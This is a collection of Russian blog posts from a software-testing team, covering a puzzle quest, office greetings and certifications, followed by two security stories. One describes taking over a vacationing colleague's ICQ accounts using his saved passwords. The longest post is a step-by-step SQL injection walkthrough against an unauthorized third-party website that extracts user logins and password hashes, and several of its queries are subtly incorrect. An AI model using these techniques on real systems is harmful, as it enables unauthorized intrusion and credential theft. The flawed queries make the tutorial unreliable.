У нашего друга и коллеги был на досуге ДР. Коллективным разумом было решено подарить ему кошель, хорошший такой. Само собой дарить его пустым не кашерно. Решили положить доллар и….мы были бы не мы – одну wmz, но не просто wmz, а бумажку с фразой (eNuzibAKlavius) которая являлась кодом транзакции к этой деньге. Именинник промучался часа 1,5 в попытках понять шо сие за бумага.

После этого в наших нестандартных головах появилась навязчивая идея – выделять из комманды (добровольно принудительно) подопытного и устраивать ему квест из серии таких задач.

Сама история:

Я вызвался быть первым участником эксперимента и почти целую неделю делал вид, что не замечаю косяков, хихиканей и каких-то движений по организации головоломок.

Первый квест:

Задача раз:

И вот в один прекрасный день у меня на столе оказался желтый конверт, внутри которого было это:

Ребята заранее продумали подсказки для меня, которые ещё планировались быть платными, но меня пронесло и как гриться халява рулила.

Я и правда не знал как на самом деле выглядит шрифт Брайля, поэтому те знаки на фотке вызвали у меня ступор, но потом оказалось, что если поколдовать с google и азбукой, получается адрес: qaquest@yandex.ru

Ниже была строка в начале которой красовалось сокращение Subj:

Мой моск рождал два варианта: либо в этом почтовом ящике надо искать письмо с таким сабжем, либо на ящик писать письмо и ждать какого-нить чуда.

Всё оказалось достаточно просто – по отправке письма с указанным сабжем на указанное мыло пришел автореплай:

“Митя, у тебя все получается!

Необходимо с паспортом попасть на ул.Александра Невского  строение 1 и у чёртовой дюжины на стекле потребовать то, что предназначено именно тебе!

Желаем удачи!

Твои друзья.”

2. Задача два:

Из истории любимого города (в том же google) я узнал что улица Александра Невского это (офигеть) Роза Люксембург.

Понять что в письме указан адрес Главпочтамта – было не трудно и что надо идти в окно 13 с пасспортом за письмом до востребования, тоже оказалось по силам поему IQ.

В письме была бумажечка:

Шрифт оч “удобный” для чтения (специально видимо) набирал я её минут 5, усердно и сосредоточенно:

http://quest.qateam.com.ua/bo7y1nx8eru09832yb17823tyxbqe78ry9b7t.html

Даже получилось с первого раза кажется.

3. Задача три:

По ссылке, как вы можете убедиться сами, милое создание Лёня Полуянов, (как мне сказали потом, осилил речь только после 10 дубля) рассказал мне о следующей задаче, которую я на удивление друзьям (на радость маме) довольно легко разгадал.

Оказалось что вещь, на которую надо было посмотреть с другой стороны, это есть мой сертификат, весящий у меня на головой.

Там была бумажка:

4. Задача четыре:

По скольку мы ребята-ойтешниге, то во всех загадках мне помогал либо Гугль, либо ижи с ним.

В этот раз передо носом у меня были координаты и какая-то таблица.

Поковырявшись в Google Earth я узнал место, где должна быть какая-то надпись, высказал предположение, что это скорее всего табличка или ещё что-то, не объявление явно.

Через пару дней, как-то вечером после тренировки с это бумажкой в рюкзаке и в “слегка” нетрезвом виде я явился на место с Васей.

В общем мы долго висели на памятной плите, которая находиться возле Эмо-аллеи, и пальцами ползали по строкам и буквам.

Помню только что идея учитывать пробелы и знаки препинания отпала сразу, т.к. вторая буква тутже вышла Й, что совсем нас не устраивало.

В результате 15 минутных стараний и кряхтений (эмо детки очень долго выглядывали из-за плиты с круглыми глазами и пытались понять какого мы там делаем.) получилось что-то типа: “В подставке монитора”.

примечание: Если кто смотрел фильм с Кейджем – Сокровище нации, головоломка была взята оттуда. Помните момент, когда Николас попросил мальчика выбрать определенные буквы из 14 (кажеться) писем какого-то президента США, которые хранились в музее.

Так вот Серега Алиев взял эту идею оттуда.

Финал:

Во вторник, выйдя на работу, когда никого не было в отделе, залез в подставку монитора. Там нашел свой прыззз – 50 грн.

Но душа жаждала мести, и я решил разыграть хотя бы кого-нить. Им оказался Серёга.

Я сделал вид, что полез туда, но ничего не нашел. Честно говоря получилось немного “высадить” Johnny, т.к. он лично туда клал деньги. Потом посмеялись, признались и пожали друг другу руки.

В общем всем спасибо огромное. Это было достойное и интересное начало (очень гуманное отмечу).

Ждем продолжения.

Предлагаю организовать архив вещ. доков, которые учавстовали в квестах, у нас в шкафу.

Мы, всем отделом, поздравляем тебя с 3-хлетием твоей работы в нашей компании. Это не первоапрельская шутка! Дата суръёзная. И мы все рады с тобой работать. Всего-всего уже пожелали, торт доедаем (кстати вкусный торт, шайтан его). Но мы – были бы не мы! Поэтому -

На внеплановом заседании в формате “Дмитро вышел, давайте чё нить проорём, пока не вернулся” мы приняли официальное решение о присуждении тебе званий заслуженного Mac’оведа АР Крым, главного Mozill’олога BOSSdev UA, а также народного блограйтера, вебманёра и т.д. и т.п. хцп-пчс

Ура!

Компании могут подойти к переманиванию поиску готовых специалистов не из принципа “купить дешевле, а продать дороже”. Ведь известно, что “сотрудники приходят работать в компанию, а уходят от конкретных людей” (© не помню чей). Поэтому толчком для перехода в другую компанию кроме повышения з\п (пусть и незначительного) может послужить обстановка (отношения с кем-то) в “родной” компании. Это не к тому, что конторам, которые ищут сотрудников нужно срочно устраивать провокации в фирмах, в которых эти самые ценные кадры плодятся. Это скорее к тому, что тем, у кого есть – нужно ценить. Ибо “что имеем не храним, потерявши – плачем” © Народ.

С другой стороны, если уж у компании есть необходимость в улучшении качества продукта, то зачастую, действительно, проще подтянуть внешнюю команду на договорной основе. Это и готовые специалисты (которые скорее всего имеют рекомендации и ряд уже выполненых работ), и зверей убивать не надо возможность привлекать их только тогда, когда это нужно, а не “кормить зазря”.

Если у кого-то возникнет вопрос: “А к чему ты это, Дмитро, написал?”, отвечу – “А вот захотелось мне мысль озвучить!”

Иоганн Вольфганг Гёте.

В прошлом 2007 году, воспользовавшись случаем, мы бесплатно прошли тестирование на Brainbench.
Были достигнуты довольно хорошие результаты и все успешно получили сертификаты по Software Testing, а некоторые ещё и по Software Quality Assurance.

В новом 2008 году, наша компания решила нас наградить за наши заслуги – были заказаны печатные сертификаты. Этому событию мы были приятно удивлены и рады. Отныне рамки с нашими заслугами красуются на стенах нашего офиса !

Ну и несколько фото:

Еще раз поздравляю всех, желаю, чтобы каждый баг имел свою персональную запись в багтреке (желательно с отметкой о фиксе ), ну а кроме того, всем хорошего начальства и адекватных заказчиков.

Удачи всем.

PS: википедия, кстати, склоняется к тому, что событие сие произошло таки в 1947, а значит – юбилей сегодня.

Technorati Tags: First Computer Bug, September 9th

Привлечение хорошего дизайнера к проекту не избавляет вас от необходимости систематически проводить тесты на юзабилити. Для уменьшения риска создания неправильного интерфейса и улучшения его качества необходимы тесты с пользователями и прочее.

Перевод статьи Якоба Нильсена “The Myth of the Genius Designer”

Ушел один из наших коллег в отпуск.
И толи по запаре толи по наивности оставил сохраненными пароли на два аккаунта в аську под квипом.

Обнаружив такое дело, мы решили поиздеваться над нашим секьюрщиком. (по доброму конечно же).

Загрузились под его аккаунтом, изменили primary e-mail на свой, а чтобы поменять пароли пришлось воспользоваться веб сервисом на icq.com. Так же мы изменили дополнительные вопросы.

Какого же было наше удивление, когда товарисч вернулся из отпуска и без проблем востановил себе пароли на оба аккаунта.

Оказалось что icq-шный сервер хранит как primary e-mail два последних введеных адреса.

И любой из них оказывается валидным при указании в форме востановления пароля.

Ещё один нюанс в том, что при сбрасывании пароля, на мыло высылается линка, по которой можно пройти так сказать для подтверждения. Эта линка валидна в течении суток, даже в том случае если пользователь из под своей учётной записи ещё раз поменял пароль или primary e-mail.

Таким образом злые шутники вместе с пострадавшим целый день игрались, меняя пароли на несчастном аккаунте.

В общем учтите в будущем эти мелочи, которые могут оказаться очень “приятными”.

Список всех бесплатных экзаменов здесь.

Cracking – серийники меняются, но байты остаются .

Почему я заинтересовался хаккингом – не помню: было это ещё тогда, когда я учился в школе. С чего же я начал? А начал я совсем не с того, с чего следовало! Сначала, искал в интернете статьи о том, как взломать сайт. Почитав их, так ничего и не понял. А как тут понять если эти статьи писали такие же как и я?! После уймы потраченных часов в Сети, разорившись на постоянных покупках интернет-карт, я подумал, что то, чем я пытаюсь заняться – это НЕРЕАЛЬНО, и я стал изучать приёмы крекинга. Вот тут- то уже у меня и стало получаться (начиналось это дело с диска “Золотой Хакер 2000″, как сейчас помню), 14-ти гиговый винт был полностью забит разными дебагерами, HEX редакторами и другими подобными инструментами. Увлекался я этим делом около полугода и думал, что я теперь не просто крут, а МЕГА-КРУТ!!!. Но не тут- то было, как я позже понял – поменять значение байта в редакторе и таким образом зарегить прогу – не такое уж и трудное дело!

Hacking – уязвимость либо есть, либо есть- её просто не может не быть!

Прошло время, и я вернулся в нашу реальность… Поступил в универ, устроился на работу. Так как она (работа, да и реальность тоже) напрямую связана с тестированием ПО, я изучал различную инфу по тестингу. И вдруг мне вспомнилось моё старое увлечение , нет не крекинг, а хаккинг. Тут та я и стал изучать “ИСКУССТВО” хаккинга. Благо с нами работают хорошие разработчики, один из них меня и направил на путь истинный! Наконец- то я понял, что “Взломать сайт” – это понятие не просто растяжимое, но и совершенно не правильное…

Что учить? Зачем учить???

В скором времени к нам пришёл запрос на тестирование “индусской” работы. Логика их работы до сих пор находится под секретом, раскрыть его могут лишь сами индусы. Мы не можем, то ли потому что мы не индусы, то ли потому что индусы не мы! Ладно, давайте вернёмся к нашим баранам.

Наконец-то проект пришёл, со следующим запросом:

1. Протестите

2. Протестите на уязвимости (XSS, SQL, сессии).

Детальной информации в запросе не было, но тем не менее я стал искать уязвимости XSS. Извращался над формами, как только мог. Наконец- то нашел поле, в которое можно было загнать скрипт – что я собственно и сделал. Вводим в поле следующий скриптик: <script>alert(‘XSS’)</script> и сабмитим форму (мысль была стандартна – если админ просмотрит отосланную инфу, то увидит поп-ап окошко с надписью XSS). Я мигом залогинился в админку и открыл секцию, в которую должны были приехать отосланные результаты. До чего же мне было обидно, когда я увидел свой скрипт – alert(\’XSS\’) – что то вроде этого. Бага конечно была – в том, что можно засабмитить форму со спец-символами, но толку от этого мало. Пробовал извращаться с перекодированием символов, но всё напрасно – индусы, они и в Африке индусы. SQL-injection даже не искал, просто потому, что не знал, что искать и где искать. Как бы теорию знал: “Введите в поле ‘ и если вылетит sql ошибка, то уязвимость есть!”, а что дальше и что делать, если ошибка не выводится, но проявляется какое-либо другое (не стандартное) поведение?

После этого я стал направленно искать информацию об SQL уязвимостях, читал, практиковался, но толку почти не было. Как вдруг напоролся на портал – http://www.cyberinfo.ru там же нашел ряд статей “Курс Молодого Бойца”, написанных неким Infringer’ом. Прочитал все статьи от начала и до конца. Установил XAMMP (набор из MySQL, PHP, Apache, PHPmyAdmin) просто универсальный набор, после установки не требует дополнительного напиллинга. Создал базу данных, и несколько скриптов (сверху вы видели ссылку на упомянутый сайт там же и найдёте статьи (если конечно же есть желание), постить чужое – рука не поднимается). Потренировался и понял, что ничего невозможного не бывает, главное желание!

Как это было или борьба с наживой на халявных ресурсах.

И вот как то я напоролся на один сайтец, на котором нам предлагали заплатить денежку и ждать пока на мыло придёт ссылка на фильм или игру. Ну разве это правильно? Таким образом люди не научатся работать с Google!!! Вдруг я глянул на урл страницы, на которой находился, вот как он выглядел – http://bla.bla.bl/catalog.php?id=1. Хмм… значит php есть. Запоминаем как выглядит эта страница, открываю страницу с id=2 (http://bla.bla.bl/catalog.php?id=2). приписываем к значению id=2 “-1″, получилось – http://bla.bla.bl/catalog.php?id=2-1. Нажимаем заветную кнопочку “Enter” и вуаля!!! Видим первую страницу. Получается, что запрос 2-1 обработался успешно и в результате id принял значение 1. А значит, sql уязвимость есть! теперь, после номера ID ставим одинарную кавычку, нажимаем Enter. получаем – Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in… Отсюда делаем вывод, что в качестве СУБД используется MySQL. Что есть хорошо!

Идём дальше:

Дело в том, что sql запросы можно объединять с помощью команды UNION, этим взломщики и пользуются. Но есть одна проблема, в MySql после команды union можно использовать только один запрос – Select, но и здесь люди нашли выход. Прежде всего, нам нужно определить количество полей в текущей таблице, делается это с помощью поочерёдного подставления значения NULL в эти поля, делается это следующим образом:

http://bla.bla.bl/catalog.php?id=1+union+select+null/*

Теперь опишу все, что мы написали:

1. http://bla.bla.bl/catalog.php?id=1 – адрес с айдишником

2. union – Объединение запросов

3. select – запрос на выбор нужной информации.

4. null – пустое значение (вместо NUll можно использовать и простые цифры – 1,2,3,4,5 – но я привык использовать null)

5. + – заменитель пробела, дело в том, что, если мы воспользуемся пробелом, то он будет перекодирован в %20, при поиске информации это очень сильно путает.

6. /* – знак коммента, все значения, введённые за данной по очерёдности символов не будут восприниматься.

Продолжим:

На запрос – http://bla.bla.bl/catalog.php?id=1+union+select+null/*

Мы увидели mysql ошибку, значит запрос не обработался, подставляем еще один NULL:

http://bla.bla.bl/catalog.php?id=1+union+select+null,null/* – снова ошибка. Продолжаем дальше подставлять null, пока запрос не обработается, и мы не увидим страницу в первоначальном состоянии (возможно ошибка все еще будет показываться, но тем не менее информация отображаться будет).

Страница отобразилась правильно после того, как мы подставили восемь значений NULL:

http://bla.bla.bl/catalog.php?id=1+union+select+null,null,null,null,null,null,null,null/* - на каждом сайте по-разному.

Отлично, идём дальше:

Теперь нам нужно определить, какие из полей могут принимать информацию, делается это очень просто- на место Null поочерёдно вводим цифры, пока где-нибудь на странице не появятся введённые цифры, к примеру:

Я ввел последовательность цифр 12345 в 3-е поле (конечно же, я начал с первого поля, но символы отобразились только когда я попытался их ввести в 3-м поле):

“http://bla.bla.bl/catalog.php?id=1+union+select+null,null,12345,null,null, null,null,null/*”

Ищем на страничке эти символы, долго искать не пришлось – они отобразились внизу страницы, как дополнительная ячейка в таблице с надписью – 12345.

Гуудд! Теперь приступаем непосредственно к сбору инфы:

В MySql есть три замечательных команды:

version() – показывает версию mysql

Database() – показывает базу данных

User() – показывает юзера текущей базы данных

Для того что бы получить имя базы данных изменяем запрос на:

“http://bla.bla.bl/catalog.php?id=1+union+select+null,null,database(), null,null,null,null,null/*”

Нажимаем Enter и смотрим на то место, где у нас отображались введённые ранее символы 12345:

Видим, что база данных называется – “blaload” – хорошо…

Попытаемся подобрать имя нужной таблицы в этой базе данных и название нужного нам столбца в ней:

нам нужна таблица с именами и паролями юзверей, предположим, таблица называется user, а нужный нам столбец login:

вставляем запрос – select+login+from+user (выбрать столбец “Login” из таблицы “User”):

“http://bla.bla.bl/catalog.php?id=1+union+select+null,null,login,null,null, null,null,null+from+user/*”

вы видите то что нужный нам столбец пишется в поле, которое воспринимает инфу, а уже где эту инфу брать (from+user) в конце запроса, это обязательно! Если вы что- либо перепутаете, у вас ничего не выйдет. Запомните – нужная инфа вводится в поле, которое может принимать инфу, место где она находится – в конце запроса.

Ну, тем не менее, у меня ничего не вышло, я перепробовал еще множество возможных названий таблиц и столбцов в них, но у меня ничего не вышло…

Я уже было отчаялся, но решил посмотреть версию MySql, c помощью команды version():

“http://bla.bla.bl/catalog.php?id=1+union+select+ null,null,version(),null,null,null,null,null/*”.

Видим, что версия Mysql – 5.0.26. Я пошёл в гугл и начал искать – уязвимости Mysql 5.0.26. Не прошло и пяти минут, как я нашёл нужную информацию!

Дело в том, что в MySql версии выше 5.0 (включая), есть замечательные функции – INFORMATION_SCHEMA.TABLES и INFORMATION_SCHEMA.COLUMNS с ними соответственно используются запросы table_name и column_name. Они нужны для того, чтобы увидеть, какие таблицы есть в базе данных, и как называются столбцы в этих таблицах (грубо говоря – это просто спасение для взломщиков). Ну хватит рассказывать, давайте продолжим:

1. Смотрим присутствующие в БД таблицы: “http://bla.bla.bl/catalog.php?id=2+union+select+null,table_name,null,null, null,null,null,null+from+INFORMATION_SCHEMA.TABLES/*”

Видим, что наш лист значительно увеличился и радуемся – просто суперклассно, очень много интересных таблиц, но вот та, которую мы искали – bla_auth.

2. Отлично, теперь смотрим имена колонок в этой таблице. Объединять запросы я пытался (для того чтобы посмотреть названия колонок, может быть просто потому что устал- не знаю даже), но тем не менее, если мы просмотрим название всех колонок (column_name from INFORMATION_SCHEMA.COLUMNS), то будет не так уж и сложно определить, какие из них относятся к таблице “bla_auth”.

“http://bla.bla.bl/catalog.php?id=2+union+select+null,column_name,null,null, null,null,null,null+from+INFORMATION_SCHEMA.TABLES/*”

Просматриваем результаты (их довольно много) и видим интересующие нас колонки – login и psw.

Ну что, теперь приступим к извлечению нужной нам инфы?

1. Узнаём имена пользователей – SELECT login FROM bla_auth

“http://bla.bla.bl/catalog.php?id=2+union+select+null,login,null,null,null,null,null, null+bla_auth/*”

В результатах видим все логины .

2. Теперь приступим к пароликам – SELECT pwd FROM bla_auth

“http://bla.bla.bl/catalog.php?id=2+union+select+null,login,null,null,null,null,null,null+ bla_auth/*”

Вот теперь видим все пароли, нам остаётся только сопоставить их с логинами – первый пароль к первому логину и т.д. (Excel рулит).

Все прошло как нельзя лучше, не правда ли? Но должна же быть ложка дёгтя в бочке мёда. Где она, я вам сейчас поведаю – вместо красивых паролей мы видели их хеш , раскодировать его конечно можно, но придётся немного подождать (годик примерное на один пароль, все зависит от сложности пароля, кодирование у них MySql’евское). Но лично мне не важно, какие там были пароли, возможно даже хорошо, что я не расшифровываю их. Ведь по сути, целью взломщика могут быть не только пароли, но и база e-mail адресов пользователей, или другие данные, а цель тестера – обнаружить уязвимость и сообщить о ней разработчику.

Вот и всё дорогие друзья! Надеюсь, вам хоть чуточку понравилась моя статья, с удовольствием выслушаю критику (и приму к сведению), а так же буду рад ответить на ваши вопросы!

До скорых встреч!

Искренне ваш Le0n.

Статья была написана исключительно в ознакомительных целях, а так же для повышения бдительности программистов и администраторов.